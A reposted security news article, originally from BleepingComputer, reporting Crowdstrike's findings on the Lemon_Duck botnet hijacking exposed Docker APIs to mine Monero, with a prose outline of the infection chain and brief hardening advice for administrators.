Docker APIs on Linux servers become the target of a large-scale Monero crypto mining campaign by the operators of the Lemon_Duck botnet.
Crypto mining gangs are a constant threat to poorly secured or misconfigured Docker systems, and multiple massive exploit campaigns have been reported in recent years.
LemonDuck, in particular, previously focused on exploiting vulnerable Microsoft Exchange servers, before targeting Linux machines via SSH brute force attacks, Windows systems vulnerable to SMBGhost, and servers running Redis and Hadoop instances.
According to a Crowdstrike report published today, the threat actor behind the ongoing Lemon_Duck campaign is hiding their wallets behind proxy pools.
Campaign details
Lemon_Duck accesses exposed Docker APIs and runs a malicious container to retrieve a Bash script disguised as a PNG image.
Add a malicious cronjob (Crowdstrike)
The payload creates a cronjob in the container to download a Bash file (a.asp) that performs the following actions:
Kill processes based on names of known mining pools, competing crypto mining groups, etc. Kill daemons like crond, sshd, and syslog. Remove known IOC (Indicator of Compromise) file paths. Disable network connections to C2s known to belong to competing crypto mining groups. Disable Alibaba Cloud’s monitoring service that protects instances from risky activities.
Disable Alibaba Cloud Monitor (Crowdstrike)
Disabling security features in Alibaba Cloud services was previously observed in crypto mining malware in November 2021, employed by unknown actors.
After the above actions are performed, the Bash script downloads and runs the crypto mining utility XMRig along with a configuration file that hides the actor’s wallets behind proxy pools.
After the initially infected machine is set up to mine, Lemon_Duck attempts to make lateral moves using SSH keys found on the file system. If they are available, the attacker uses them to repeat the same infection process.
Searching for SSH keys on the file system (Crowdstrike)
Keeping Docker Threats Under Control
Parallel to this campaign, Cisco Talos reports on another campaign attributed to TeamTNT that also targets exposed Docker API instances on Amazon Web Services.
That threat group is also trying to disable cloud security services to evade detection and continue mining Monero, Bitcoin, and Ether for as long as possible.
Obviously, the need to securely configure Docker API implementations is imperative, and administrators can start by comparing the platform’s best practices and security recommendations to their configuration.
In addition, set resource consumption limits for all containers, enforce strict image verification policies, and enforce least privilege principles.
This post Docker servers hacked in ongoing crypto mining malware campaign
was original published at “https://www.bleepingcomputer.com/news/security/docker-servers-hacked-in-ongoing-cryptomining-malware-campaign/”
